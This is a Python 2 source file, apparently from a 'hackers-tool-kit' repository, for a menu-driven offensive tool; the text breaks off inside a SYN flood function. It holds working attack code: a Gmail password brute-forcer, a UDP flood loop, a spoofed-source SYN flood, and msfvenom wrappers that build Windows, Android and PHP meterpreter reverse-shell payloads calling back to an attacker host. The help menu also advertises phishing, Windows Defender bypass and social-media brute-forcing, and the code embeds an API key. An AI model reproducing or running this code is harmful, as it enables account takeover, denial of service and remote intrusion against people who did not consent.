hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[9msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php1m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,7) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file ] +phpload : make a php reverse_tcp payload and start it in a multi handler +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + 